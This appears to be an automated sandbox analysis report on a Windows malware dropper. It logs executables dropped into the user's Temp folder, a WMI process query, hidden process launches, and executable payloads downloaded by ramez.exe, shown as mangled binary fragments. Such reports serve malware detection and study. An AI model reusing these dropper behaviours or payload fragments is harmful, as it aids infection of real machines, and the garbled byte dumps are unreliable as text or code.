Drops an executable to the user AppData folder (10 events)

file	C:\Users\test22\AppData\Local\Temp\10020550101\amnew.exe
file	C:\Users\test22\AppData\Local\Temp\Work\cecho.exe
file	C:\Users\test22\AppData\Local\Temp\is-6FDHC.tmp\a3e8f181a3.tmp
file	C:\Users\test22\AppData\Local\Temp\d610cf342e\ramez.exe
file	C:\Users\test22\AppData\Local\Temp\Work\7z.exe
file	C:\Users\test22\AppData\Local\Temp\10020490101\207216b66f.exe
file	C:\Users\test22\AppData\Local\Temp\10020170101\2d05347e68.exe
file	C:\Users\test22\AppData\Local\Temp\10019230101\dDthTIC.exe
file	C:\Users\test22\AppData\Local\Temp\10020510101\a3e8f181a3.exe
file	C:\Users\test22\AppData\Local\Temp\10017910101\FuaxeNA.exe

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

A process created a hidden window (13 events)

Time & API	Arguments	Status	Return
ShellExecuteExW May 4, 2025, 12:45 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\d610cf342e\ramez.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\d610cf342e\ramez.exe	1	1
ShellExecuteExW May 4, 2025, 12:45 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10015950101\lYvr05n.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10015950101\lYvr05n.exe	1	1
ShellExecuteExW May 4, 2025, 12:45 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10017910101\FuaxeNA.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10017910101\FuaxeNA.exe	1	1
ShellExecuteExW May 4, 2025, 12:45 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10018450101\OE1vOqz.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10018450101\OE1vOqz.exe	1	1
ShellExecuteExW May 4, 2025, 12:45 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10019230101\dDthTIC.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10019230101\dDthTIC.exe	1	1
ShellExecuteExW May 4, 2025, 12:45 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10020170101\2d05347e68.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10020170101\2d05347e68.exe	1	1
ShellExecuteExW May 4, 2025, 12:46 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10020490101\207216b66f.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10020490101\207216b66f.exe	1	1
ShellExecuteExW May 4, 2025, 12:46 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10020500101\39d8455be9.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10020500101\39d8455be9.exe	1	1
ShellExecuteExW May 4, 2025, 12:46 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10020510101\a3e8f181a3.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10020510101\a3e8f181a3.exe	1	1
ShellExecuteExW May 4, 2025, 12:46 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10020520101\dDthTIC.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10020520101\dDthTIC.exe	1	1
ShellExecuteExW May 4, 2025, 12:47 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10020530101\lYvr05n.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10020530101\lYvr05n.exe	1	1
ShellExecuteExW May 4, 2025, 12:47 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10020540101\bPtJj46.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10020540101\bPtJj46.exe	1	1
ShellExecuteExW May 4, 2025, 12:47 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10020550101\amnew.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10020550101\amnew.exe	1	1

An executable file was downloaded by the process ramez.exe (13 events)

Time & API	Arguments	Status	Return
InternetReadFile May 4, 2025, 12:45 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd\|%hð"èx@paz`p(`ð(&p @X¡À.textçè `.rdataÂÄð@@.data8,Ð´@À.pdataÄ@@.OLM à `.gxfgp0æ@@.retplnePü_RDATAô`þ@@.relocp@B.bsshh@À.bsshð hp @À.rsrcð`Ø@@AWAVAUATVWUSHìxÖHÏHäÁH1àHD$p3qèHD$(HGHÁHÁéL$0àA¹Èª&1ÒA¼mÊ¥AºL3A»ñ«l½,RÆd¹n{A¾]æ]Aùû¶IGéÅÎ{ÿ¯û@öÇA¹¿é'¿/ßrDDÏ=óÍ DLÏf.Aùû¶IAù®L&Aù+RÆdAùð«lwAù,RÆdÀAùÕ"hiêAùÁßiu©Í{ÿ¯û@öÇA¹ÌDDÉ=lÍ DLÉAùû¶If.Aùß´ÑAù0Ñ«AùÚvÌ»RAù1Ñ««AùA®¶AùoÏ¤µ"ÿÿÿHc\$dH\|$(i<éÑ[ûÁë1ûiÛéÑ[i\|$`éÑ[1ß\|$L\$dÃ\$PÅÌ{ÿ¯û@öÇA¹É¦n¿¯çÞÓé±þÿÿf.AùÈª&±AùL3öAùÈª&=Aùgù3'WAù³þ1þÿÿH\$@HûA¹×2<å¿ÛvÌ»DDÏE1íAùû¶IdþÿÿéâþÿÿfAùdèAùõrã ÍAùdèAùR»ý1AùþÿÿH\$8¾3\$liÛéÑ[3\$`\$\ÏË{ÿ¯û@öÇA¹"Øt¼¿7qÞé»ýÿÿAùCL>\ËAùDL>\ÿAù]æ] Aùäc¡ýÿÿH\$8¾[Áã3\$h\$XgË{ÿ¯û@öÇA¹»¬>EDÊ=PË ELÊAùû¶IhýÿÿéæýÿÿAùlÊ¥AùmÊ¥ÏAùn{ßAùÈèOª"ýÿÿüÊ{ÿ¯û@öÇA¹É¦n¿oÏ¤µéèüÿÿAù¢}Aù ¢¸Aù7qÞ¦üÿÿAùÌÎüÿÿA¹ÁßiAùû¶IÈüÿÿéFýÿÿAùLÞpAùMÞAù×2<å°AùðBçüÿÿH\$@HûA¹ ¢»ì DLËE1ÀAùû¶IgüÿÿéåüÿÿAùñ«lAùÉ¦nAù/ßr.üÿÿÊ{ÿ¯û@öÇA¹ü¶IEDÎ=ñÉ ELÎAùû¶I üÿÿéüÿÿAùÛvÌ»ºAù"Øt¼ÒAùè ÒÀÐûÿÿªÉ{ÿ¯û@öÇA¹MÞ¿!¥>éûÿÿAùL3ñAù!¥>AùÆûJûÿÿcÉ{ÿ¯û@öÇA¹1Ñ«¿örã éOûÿÿAùörã ÿAùãÃ[ Aù¿é'BûÿÿH\$8\$l\$l\$l\$l\$l\$l\$l\$l\$l\$`A¹gù3'Aùû¶IûÿÿéûÿÿAù®L9Aù2«Wãúÿÿ\$0\$dA¹R»ýAùû¶IÕúÿÿéSûÿÿAù3.Aù»¬>©úÿÿH\$8\$h\$h\$h\$h\$hA¹äcAùû¶IúÿÿéûÿÿAùü¶I\|Aùì ^úÿÿDD$h3È{ÿ¯û@öÇA¹Ì¿ÁßiéúÿÿAùà´ÑUAù¯çÞÓúÿÿt$LT$PA¹Èª&Aùû¶IúÿÿéúÿÿÙÇ{ÿ¯û@öÇA¹DL>\EDË=ÂÇ ELËAùû¶IÚùÿÿéXúÿÿ¢Ç{ÿ¯û@öÇA¹DL>\DDÍ=Ç DLÍAùû¶I£ùÿÿé!úÿÿA¹ÆûJAùû¶Iùÿÿé úÿÿH\$8A¹3.Aùû¶Inùÿÿéìùÿÿt$`T$d=.Ç_ÿ¯ßöÃA¹2«W¿R»ýéùÿÿÇ{ÿ¯û@öÇA¹"Øt¼¿éûøÿÿH\$@HûA¹ðBç¿³þ1DLÏAùû¶Iýøÿÿé{ùÿÿ\$0\|$d9ßD$7¶Æ{ÿ¯û@öÇA¹2«W¿ãÃ[é¢øÿÿA¹,RÆdAùû¶I request_handle: 0x00cc000c	1	1
InternetReadFile May 4, 2025, 12:45 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL ^hà>"n\ `@ ` \K`\|Ù[ H.textt< > `.rsrc\|` @@@.reloc`@BP\H G(ògÈ9«0 þ8þEP#}¤88 8Ëÿÿÿ8 8¼ÿÿÿþ òÿÿÿ>g ~U{y:ÿÿÿ& 8ÿÿÿþ >Åÿÿÿ ~U{_9mÿÿÿ& 8bÿÿÿþ ( þ þ8Cÿÿÿrps z( é s ( þ 8ÿÿÿ(&~þ~0G(8( ~U{9& 8 8ÌÿÿÿþE8&~þ~0G(8( ~U{89& 8 8ÌÿÿÿþE8&~þ~0 þ8þE/¾Xl8s ~U{9»ÿÿÿ& 8°ÿÿÿs ~U{J:ÿÿÿ& 8ÿÿÿs 8sÿÿÿs ~U{:Uÿÿÿ& 8Jÿÿÿs ~U{9,ÿÿÿ& 8!ÿÿÿ( ~U{L9ÿÿÿ& 8ýþÿÿ0~o 0~o 0~o 0~o 0~o &~ þ~ 0[ þ8þE8{ { (+} ~U{p:Âÿÿÿ& 8·ÿÿÿ0ã þ8þE:ef88 8Óÿÿÿ:K ~U{B9¸ÿÿÿ& 8ÿÿÿ{ @Ïÿÿÿ ~U{:ÿÿÿ& 8ÿÿÿ* Q) c àâa~U{Ta(s z\| o+ ~U{6::ÿÿÿ& 8/ÿÿÿ0) 9þo 9~9K~Ð(! o" 9< ×ÜÐe c ¨äua~U{a((# s$ zs% ~Ð(! o& (+ Ýu"%:&8%(( o) þþþþ& iF¥Ñ »øa~U{Ia( o) o* ¢ (# o) s+ z~Ð(! o, Ü8*ÆEz0 þo- þ0G(8(. ~U{9:& 8 8ÌÿÿÿþE80 (/ (0 0(1 0Ð(! 0 (2 &~þ~0 (/ (0 0(1 0Ð(! 0 (2 0 :(+0 þ0G(8(. ~U{}:& 8 8ÌÿÿÿþE8&~ þ~ 0~3 : (+3 ~3 0G(8(. ~U{X:& 8 8ÌÿÿÿþE8&~4 þ~4 0p(8(5 ~U{ :& 8 8ÌÿÿÿþE8%o- ~U{c9Ôÿÿÿ& 8Éÿÿÿ0@ þ8þE8:e ~U{I:& 8þE){WB8$8q ~U{4:Éÿÿÿ& 8¾ÿÿÿ{: þ8¡ÿÿÿ{o6 8ÿÿÿ8 ~U{9wÿÿÿ& 8lÿÿÿÝ<ÿÿÿ(7 ~U{p:& 8þE8Ü ~U{t9Ýþÿÿ& 8Òþÿÿ&Âè90ï% þ8þE×æ MC!° HM¥Ãõ©F.ÜJ áD) sA¨Wym$~ ù ¥e)ú?`Ñ!ÎãålY Ï¦J ²Ýª6*6 Þ H(R Ú®êôµv~ £ û 7ÑzàáIâô>Ô^æ _Óç·EÈKªWþ é¹!<"+º7) -¢!êàÓÔù~ZN < î zú4 Âwjio # ÿn ¶.ðû[_«eà0² ¼ :þ{¤õÌ ÒÚ¸È®o request_handle: 0x00cc000c	1	1
InternetReadFile May 4, 2025, 12:45 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEdýihð"ê8@P` (@ð4h (&p0 @¡À.textZèê `.rdata4ÃÄò@@.datah,Ð¶@À.pdata4Æ@@.OLM â `.gxfgp0ì@@.retplneP_RDATAô`@@.relocp@B.bss\\@À.bss\à \j @À.rsrcð@Æ@@AWAVAUATVWUSHìHæÁH1àH$eÎ-cÎXÿ¯ØöÃD$2ý D$3T$,HÏ¸Äp3A½s;r½ÊCo=G{è/ëy#ÎHÿ¯ÈöÁ¸@Ë¹ÖMo»DÁ= Î LÁ=G{è~L=Ãp3±=P¼ñIj=þ\=Q¼ñI]=)%1O=½ÖjOu»¸wá=G{è¶f=ÎçH½Å=Ù_=rQÞ=Ùõ=¨«Ù=\|áÄÚkÿÿÿHD$HD¾pAÁæE1þ¸ÚÓi=G{èQÿÿÿëf.= à H=Vôy=Wô^=p\q=wáÿÿÿÍHÿ¯ÈöÁ¸µÂ«¹ÿ\éÛþÿÿf.=©0×N=&D=&;='ZY=½Ô¦þÿÿD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$p¸LÊ´;=G{èýÿÿéÌýÿÿ=È9B<V=É9B<5=¿Á`Fì=ZëéIMýÿÿ¸Ç/ =G{èDýÿÿéýÿÿ=@Ëu=@ËÓ=p²ÍÝ=æbÓýÿÿ\|$G¸ ¹sQÞEÁ=G{èöüÿÿé=ýÿÿ= ^= ¸=bãLË=Ç/ ¾üÿÿD$pÁè 3D$piÀéÑ[ÁÁé1ÁL$dÊHÿ¯ÈöÁ¸Wô¹wåèéwüÿÿ=µÂ«Í=µÂ«=YÎg²7=ÖMo»XüÿÿUÊHÿ¯ÈöÁ¸Gá¹wáé-üÿÿ=ÿ\!=gÈ=ÚÓiüÿÿHD$H¾D1ðDiàéÑ[D3d$h¸ÏçH½=G{èùûÿÿé@üÿÿ=sQÞ =Õß±ûÿÿ=GáÌûÿÿÉÉHÿ¯ÈöÁ¸)%1O¹Ùé¡ûÿÿ=wåè=H{èûÿÿ¸D ¦=G{èûÿÿéÖûÿÿ=MÝT=±ÚmûÿÿHcD$lHL$8iéÑ[ÁÁé1ÁiÁéÑ[iL$héÑ[1ÁL$\D$lÀD$`3ÉHÿ¯ÈöÁ¸MÝ¹ÑQuÄéûÿÿ=Äp3+=LÊ´;ûÿÿD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pD$pÓÈHÿ¯ÈöÁ¸½Ô¹ZëéIé«úÿÿ=ÏçH½ö=ÑQuÄ¢úÿÿD$\D$(¸'Zt$`=G{èúÿÿéÔúÿÿ=à â=ÐskúÿÿD$@D$@D$@D$@HD$8[ÈHÿ¯ÈöÁD$v KÈ¸LéADÅù D$wALÅHOºãç½úÉCo~úÊCot/ús;ruèéúãç½t(úLéuÐºÊCoúÉCoËëáHL$xÂúÉCoºëÐ¶\$v\|$wºLéEÕÛEÕúÉCoë¯=ª0×<=D ¦ùÿÿHD$PHø¸bãL¹&LÁ=G{è\|ùÿÿéÃùÿÿD$@L$l9ÁD$G^ÇHÿ¯ÈöÁ¸¿Á`F¹æbÓé6ùÿÿHÇHÿ¯ÈöÁD$v 8Ç¸LéADÅù D$wALÅHOºãç½f.@úÉCo~úÊCot/ús;ruèéúãç½t(úLéuÐºÊCoúÉCoËëáHL$xÂúÉCoºëÐ¶\$v\|$wºLéEÕÛEÕúÉCoë request_handle: 0x00cc000c	1	1
InternetReadFile May 4, 2025, 12:45 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELr:hàÔ0K@`Kÿ3@WàkÐðøá ÀÆ@à.rsrcðÐÖ@À.idata àØ@À +ðÚ@àbdozedic0ð00Ü@ànrtpbldi K@à.taggant00K"@à request_handle: 0x00cc000c	1	1
InternetReadFile May 4, 2025, 12:45 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $x_cí<> ¾<> ¾<> ¾¢ü¾1> ¾¢þ¾²> ¾¢ÿ¾$> ¾Ið¾>> ¾I ¿/> ¾I¿+> ¾I¿> ¾5F¾7> ¾5F¾;> ¾<>¾)? ¾ÉI¿ > ¾ÉI ¿=> ¾ÉIò¾=> ¾ÉI¿=> ¾Rich<> ¾PEL ¿ bà.@0@@@@Á°64D°64ÀH°6±T ¾@à°0HÂ@àPà @à0@àP@@à0$@à.rsrc À$@àÐ/àB@à.data °6 B@à2tW©ò{ÿÉHcÓ(þ_Íÿ÷=Ú¾j´ïØP´jØ%äI90¡VchæJçcC5$ã²µRZÚ^0 ¹ f5tÂ_`^@ð½ûÐd¨«_¸3vç.àH¬LsA¥=,tP/[Hü#hØ-v³F9è_¾ÎêuiTT,Ö (TÄþ"Z«¯q^Ó£yÔ(]st[a½zÈkRöìKS¨µCçÌb]DTc¶xeÙµÒM±zTÎÔâ Qì5¢ÍPq bÕQ¡`XáÌNÎv¶¥QuÉº^>Tz°[bÔªÆçW§'* Î\|ÃÎª$À´øÄ.LoCÚïoÓÅè²Öµnwu\Ãn¡tlf¯Ä1Øú²Ö%fÊ%ÊRóùô&-KVÑæ¦6ê°9çOã¥æ¶XµYåÇ»¡û§ûögûª´Õÿ¤ê¢Å®¤kÖ4¹xë¬ªÈaÃ\_Å¾_¾áÂÛaª©&Rªôíù.^d×}ß\]É3¹l}%¨¨N êBî<-¶nü#é5»FÀ®ÖX{Þ6¯sP?·>Ù²ùN°ËB±ÒÓ¿¸'dö-Á¦Î\_zÔº\gËÔë¥2_%q]5Íâ-0Uçõj(K´ .DD([Ìäpñ# U@{£l©îîw6°]9©ÞY5ÿi5£éV«£Ôá¹~_9 äõdA´ZÏóÈqÔOæ`ST£KÜÕiÂ¤Ó;PZ÷òTÄiC qGM³ßî\Çb0¼´ÈAÕFy{ùÑòµbèlõãÁñLqÌÈ³\|ÚQu·ñº©O7ÿDbïbû¿ßÖDÑGèèeÇÒ²{GÅ[éæuO,Q¿jäW;Î#m_ÜØÅÉ¤¬tf²\|Ä`ë?Ø¯Ó'®ÝÔû¾èÈùÑ§×%<ñ"ÝßjVc¿á?!iG? Îä2 i9 öak¬Å´TyKûæ÷ùÐ ·oÊ +~-\âHÉÖòÏgÆÔ5öCL©é×Ð¶®bËÈ}j[!-fu 5í ùÅJ\|¸Åö7Mº=õS\|¼CN¤BAá°\|Jü(Z909Öº{±ûÁFmEËi+Ä1ñhTJo@´¾rùF sk¤ú×U¡µ»> yG8Okg^ø^'Ò6g0 ½ï~P¬G7(Ñ:ïÓdãéTöÃåÅvõOqtEh]@¤4¯6Òu<Á ¬Tåpºùd÷.Á.ãÈ\9yE=J¦%9Ä§§ü¡S\|e{¼P¸æ:¤\|zãZs¯d;£Rarô[Ð\Lä¡Þã@¾Õrëëo"ÖÖ«YLÜ¤xufbV%mo7ÂÃ1Á£2çr«¹G´ }ÇæÍÒSºÕa¾mÀ\|3y9©~SåpÐSè"B9\| 8¢>:¸J/nøÿ¦G'-.9ý2cåÞ´^½=¦Ä%Rè5¼]x¥ 2öPJ=ÿn¹».:à]Ç5yóO¸RMï4ø0'ãñÀ,r$@QÎÒ}üºDZzïq6Ç§ÚâØÀ`òó7õrÀËE2@hÅp¼5cÁ?áaYl6&¦w{ßõ(&ÆÐ¼<(7%»ëÕ«ùÿæ\£ç!ò$ÖÙÀo}:Öä>!àÛQôÿá Ö©áoÛHÐHGï,éõ + ¬Ý=ØÞeêÃág"$[eÕ´É7à ºJ¯ §Hî9öia(±ï°Ä%wzI¡Ü¸HRZ3ÓÇO7÷ßÇ&^È?ÂaêÔ$`Ûo òÊÍHA3·w;¡ÍÄ ÙÆC´P27^#µmìÞ`,fÍUN½Jc,ÏÚCHbàæöÙ\¥ÛAró3óÀü@^KÖxX¯óèïóòûTðXð-ûA)ÙâN¶ë¯o8N«_B(uTßBÊÒpñÈtBÞÏãL´Ócy¨¤·)Úuõ; Á(øf.¤¬^a¿:/ºþ`X?\|ùÖÐè³ùûêIJ@£5OçÁwõa¢waèuÌØ<Â=la,eñ3îk®·híuuÿ1µjz¿Fý¸:#rÅ.]`ø@0Êãý0Y\|ÐÂºÅG«xh»º ¥é´Ð Íû÷FÚ·»°Ì=S QD%úL^Ó\| ªß¢EÆÚË¥\|ÖOþ=d^AÀ w©ÑÐÞè~O$O2ÇÓf`=é[iÊ Õ¿ø4xÇ¡úþ~£vÄägõõý\|49è¯(Lùü«Tzå²'ØÖÕg]8 XÛØ(K#ß¹Ñ8:21#,q¿Ðþ¾ Ø?Þ"²E?ý.I¡ôY?dE¯\RWÛP¤¥«¢ ÷le4Kf@è«M ,rîª·Ea@ãç¬RÇK÷5,!/1eØ ¤+Åh§¥ÿÏ ÄêW¶8KÒ`Ã÷Õ1à-WýhróbºIxkùüBl æÅ`ÔîJ~½w#å¼VKÞÐtÚ}ûÇíï~.Ù¸HÛòåABs¿X¡Géh,9ìM ,}i ¡arÿ«È ò^e 2C6¥ÆäY§B7ÓÜm9+ë^»U¤î0y?óywaVy:ðF¤kº"OîÍy5>¥°ö{ïª¤ $Õ@2§QbüI ùøoäáNV1>à¡uH<1vý(ù' ÷~nIXÇWQ\°«¨}>\°³áüMÑÅH%QÅÅ`Túpï'ÃDîx¢ÁF(ÕmO¥2W/i8Fùû¨¾& tÅë¼}Â«ßJXU¤d£#ur¢¯¢Ë ªédºÜÉGìQ¿s¹ìaUigÚsIW×óZ±m¬Á£. & Xãxà^)ùç? CÈ¯U?üwý¤KTÀOð+^µH }øÕÁßcá/K%ÎõbHïÚÓ×GuÑ-¹mÎYKTÕìÅÕN&%Åì£nÑ0Äñ!éK©æäés,@ªÆ±I:eõaHDÂ8ÉZtEÄÃÄ¸QkK(ÄÄ:%âÞ`²kÞ¿;VñåÖ®p9¸ _M²òçÝøµ[á' Ú5 ö>&K¶¹^ÂzÝPS+~Om°m\7½²vE?¹F&R÷§d{àò¿hgó,®«Fj¯÷Ú¢îÝXPÀìÄêsâù7:VMÛÚ´ºi ÎB]Ñ ª¶©f®Ì.V>ÏRóÈªÒ#¹ºÌ¾Àe¤ºµ@ïÕwæÎÌÇUýÆgè»YõñÎcW4;úò¨ÒúAj÷aÆÇÕB®ÕVÿåµJS4ÕR#'ñT<ãù¥ð¡Èq£?Ýëü{C¶ñË¨9UÔ?Ì@n O*A¿G_qãV8bu]~$eZQ©é¾¹1ë2 ¬÷hþùL3îù(NõXÞHÀ\:ùa]'æ4Íó²xçä^>+¥êöSZÎ²²\|×o1ôgº\µ:5Vj½ÀOÁ úl_¢ìö >e¹¤ÓG³A request_handle: 0x00cc000c	1	1
InternetReadFile May 4, 2025, 12:46 p.m.	buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àRn1p}p@ }2C@`07t`ðÉ0¸[}h[} P¼@à.rsrcðÉ0`¼%Ì@À.idata 07(@À À+@7(@àftynlkci`c`(@àbkbmgnxk`}ìB@à.taggant0p}"ðB@à request_handle: 0x00cc000c	1	1
InternetReadFile May 4, 2025, 12:46 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd\|%hð"èx@p©`p(`ðn (&p @X¡À.textçè `.rdataÂÄð@@.data8,Ð´@À.pdataÄ@@.OLM à `.gxfgp0æ@@.retplnePü_RDATAô`þ@@.relocp@B.bsshh@À.bsshð hp @À.rsrcð`Ø@@AWAVAUATVWUSHìxÖHÏHäÁH1àHD$p3qèHD$(HGHÁHÁéL$0àA¹Èª&1ÒA¼mÊ¥AºL3A»ñ«l½,RÆd¹n{A¾]æ]Aùû¶IGéÅÎ{ÿ¯û@öÇA¹¿é'¿/ßrDDÏ=óÍ DLÏf.Aùû¶IAù®L&Aù+RÆdAùð«lwAù,RÆdÀAùÕ"hiêAùÁßiu©Í{ÿ¯û@öÇA¹ÌDDÉ=lÍ DLÉAùû¶If.Aùß´ÑAù0Ñ«AùÚvÌ»RAù1Ñ««AùA®¶AùoÏ¤µ"ÿÿÿHc\$dH\|$(i<éÑ[ûÁë1ûiÛéÑ[i\|$`éÑ[1ß\|$L\$dÃ\$PÅÌ{ÿ¯û@öÇA¹É¦n¿¯çÞÓé±þÿÿf.AùÈª&±AùL3öAùÈª&=Aùgù3'WAù³þ1þÿÿH\$@HûA¹×2<å¿ÛvÌ»DDÏE1íAùû¶IdþÿÿéâþÿÿfAùdèAùõrã ÍAùdèAùR»ý1AùþÿÿH\$8¾3\$liÛéÑ[3\$`\$\ÏË{ÿ¯û@öÇA¹"Øt¼¿7qÞé»ýÿÿAùCL>\ËAùDL>\ÿAù]æ] Aùäc¡ýÿÿH\$8¾[Áã3\$h\$XgË{ÿ¯û@öÇA¹»¬>EDÊ=PË ELÊAùû¶IhýÿÿéæýÿÿAùlÊ¥AùmÊ¥ÏAùn{ßAùÈèOª"ýÿÿüÊ{ÿ¯û@öÇA¹É¦n¿oÏ¤µéèüÿÿAù¢}Aù ¢¸Aù7qÞ¦üÿÿAùÌÎüÿÿA¹ÁßiAùû¶IÈüÿÿéFýÿÿAùLÞpAùMÞAù×2<å°AùðBçüÿÿH\$@HûA¹ ¢»ì DLËE1ÀAùû¶IgüÿÿéåüÿÿAùñ«lAùÉ¦nAù/ßr.üÿÿÊ{ÿ¯û@öÇA¹ü¶IEDÎ=ñÉ ELÎAùû¶I üÿÿéüÿÿAùÛvÌ»ºAù"Øt¼ÒAùè ÒÀÐûÿÿªÉ{ÿ¯û@öÇA¹MÞ¿!¥>éûÿÿAùL3ñAù!¥>AùÆûJûÿÿcÉ{ÿ¯û@öÇA¹1Ñ«¿örã éOûÿÿAùörã ÿAùãÃ[ Aù¿é'BûÿÿH\$8\$l\$l\$l\$l\$l\$l\$l\$l\$l\$`A¹gù3'Aùû¶IûÿÿéûÿÿAù®L9Aù2«Wãúÿÿ\$0\$dA¹R»ýAùû¶IÕúÿÿéSûÿÿAù3.Aù»¬>©úÿÿH\$8\$h\$h\$h\$h\$hA¹äcAùû¶IúÿÿéûÿÿAùü¶I\|Aùì ^úÿÿDD$h3È{ÿ¯û@öÇA¹Ì¿ÁßiéúÿÿAùà´ÑUAù¯çÞÓúÿÿt$LT$PA¹Èª&Aùû¶IúÿÿéúÿÿÙÇ{ÿ¯û@öÇA¹DL>\EDË=ÂÇ ELËAùû¶IÚùÿÿéXúÿÿ¢Ç{ÿ¯û@öÇA¹DL>\DDÍ=Ç DLÍAùû¶I£ùÿÿé!úÿÿA¹ÆûJAùû¶Iùÿÿé úÿÿH\$8A¹3.Aùû¶Inùÿÿéìùÿÿt$`T$d=.Ç_ÿ¯ßöÃA¹2«W¿R»ýéùÿÿÇ{ÿ¯û@öÇA¹"Øt¼¿éûøÿÿH\$@HûA¹ðBç¿³þ1DLÏAùû¶Iýøÿÿé{ùÿÿ\$0\|$d9ßD$7¶Æ{ÿ¯û@öÇA¹2«W¿ãÃ[é¢øÿÿA¹,RÆdAùû¶I request_handle: 0x00cc000c	1	1
InternetReadFile May 4, 2025, 12:46 p.m.	buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL~gàp p @Ð @@pqPì° ÔR\`¤.textV X `.itext@p \ `.data88 :t @À.bssxrÐ À.idataìP® @À.didata¤`¾ @À.edataqpÀ @@.tlsÀ.rdata]Â @@.reloc Ä @B.rsrc°Ò@@Ð ä@@@Boolean@FalseTrueSystem4@AnsiCharÿP@ Charÿÿh@ShortIntÿÿÿ@SmallIntÿÿÿ @Integerÿÿÿ¸@ByteÿÐ@Wordÿÿè@Cardinalÿÿÿÿ@Pointer@Int64ÿÿÿÿÿÿÿ8@UInt64ÿÿÿÿÿÿÿÿX@ NativeIntÿÿÿt@ NativeUIntÿÿÿÿ@Single @Extended´@DoubleÄ@CompÔ@Currencyè@ShortStringÿü@ PAnsiChar0@@ PWideCharL@,@ByteBoolÿÿÿ(@FalseTrueSystem\@WordBoolÿÿÿX@FalseTrueSystem@LongBoolÿÿÿ@FalseTrueSystem¼@stringÌ@ WideStringà@ AnsiStringô@Variant@ OleVariant@TClass@,@HRESULTÿÿÿD@TGUIDä@D1Ì@D2Ì@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right (JEmpty@@ (JCreate@@Data@ BigEndian (JCreate@@´@Dataä@AStartIndex@ BigEndian(JIsEmpty@¤@PInterfaceEntry¼@À@TInterfaceEntry@@IID@VTable@IOffsetp@ ImplGetter0@PInterfaceTableH@L@TInterfaceTableÄE@ EntryCountEntries@TMethod@Code@Data(J&op_Equality@@Left@Right(J&op_Inequality@@Left@Right(J&op_GreaterThan@@Left@Right(J&op_GreaterThanOrEqual@@Left@Right(J&op_LessThan@@Left@Right(J&op_LessThanOrEqual@@Left@Right\|@ @\|@@ø~@@ð@è@@@@@}@¤}@Ø}@"@DôÿÀ@Bôÿä@Bôÿ @CôÿK@Bôÿz@Bôÿ£@Côÿ×@Côÿ@Côÿ;@Côÿd@Côÿ@CôÿÌ@Côÿ@CôÿB@Côÿ@CôÿÅ@Bôÿÿ@Bôÿ9@Bôÿ@Côÿ½@Côÿî@Côÿ!@CôÿU@Jõÿ@Jöÿ³@J÷ÿæ@JøÿA@Jùÿr@Júÿ£@JûÿÜ@Jüÿ@KýÿF@Jþÿr@MÿÿTObject&¸}@Create@Self$è}@Free@Self)(J DisposeOf@Self>ô}@InitInstance@Self@Instance/~@CleanupInstance@Self)(J ClassType@@Self4l}@ ClassName¸@Self@¸@9}@ClassNameIs@Self¸@Name+(JClassParent@Self)(J ClassInfo@Self,(JInstanceSize@Self<Ô@InheritsFrom@Self@AClass;<@ MethodAddress@Selfä@Name;¬@ MethodAddress@Self¸@NameFÔ@ MethodName¸@Self@Address@¸@=(JQualifiedClassName¸@Self@¸@: @FieldAddress@@Selfä@Name: request_handle: 0x00cc000c	1	1
InternetReadFile May 4, 2025, 12:46 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELr:hàÔ0K@`Kÿ3@WàkÐðøá ÀÆ@à.rsrcðÐÖ@À.idata àØ@À +ðÚ@àbdozedic0ð00Ü@ànrtpbldi K@à.taggant00K"@à request_handle: 0x00cc000c	1	1
